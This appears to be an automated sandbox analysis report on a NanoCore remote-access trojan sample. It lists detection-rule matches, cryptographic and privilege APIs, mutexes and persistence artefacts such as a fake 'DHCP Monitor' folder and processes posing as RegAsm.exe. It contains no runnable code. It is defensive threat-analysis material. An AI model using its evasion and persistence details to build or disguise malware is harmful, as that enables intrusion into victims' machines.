        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: classification engineClassification label: mal100.troj.evad.winEXE@8/7@6/2
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2A2D5 GetLastError,FormatMessageW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2A2D5 GetLastError,FormatMessageW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18713 AdjustTokenPrivileges,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18713 AdjustTokenPrivileges,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB10DA AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB10A3 AdjustTokenPrivileges,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2BBA6 CoInitialize,CoCreateInstance,CoUninitialize,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2BBA6 CoInitialize,CoCreateInstance,CoUninitialize,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwizJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwizJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
